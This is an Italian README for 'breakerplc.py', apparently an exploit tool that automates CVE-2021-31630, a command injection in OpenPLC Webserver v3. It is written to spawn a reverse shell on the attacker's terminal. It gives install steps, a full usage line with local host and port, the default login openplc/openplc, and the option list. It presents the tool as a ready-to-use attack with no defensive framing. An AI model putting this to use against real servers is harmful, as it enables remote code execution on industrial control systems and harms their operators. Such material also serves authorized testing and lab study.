
Questa è un'automazione dello sfruttamento di cve-2021-31630.
Questo script sfrutta automaticamente la vulnerabilità in OpenPLC Web Server v3
Sarai in grado di creare una Reverse Shell automatica con il server senza dover usare tecniche manuali.
Dettaglio CVE-2021-31630 L'Iniezione di Comandi in Open PLC Webserver v3 permette a un attaccante remoto di eseguire codice arbitrario tramite il componente "Hardware Layer Code Box" nella pagina "/hardware" dell'applicazione.
Lo script è stato personalizzato in modo che, dopo aver completato la registrazione dello script in OpenPLC, generi la shell della macchina nello stesso terminale.
Usa il comando seguente (Si consiglia di creare un ambiente virtuale Python per installare le dipendenze) # Tuttavia, lo script breakerplc.py deve essere eseguito all'esterno dell'ambiente virtuale.
sudo apt update
pip3 install requests
Come usarlo? Puoi usare queste righe di comando (sotto).
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

IMPORTANTE
Dopo la connessione, devi scrivere "whoami" o "ls" per interrompere la riga di codice e far tornare la shell.
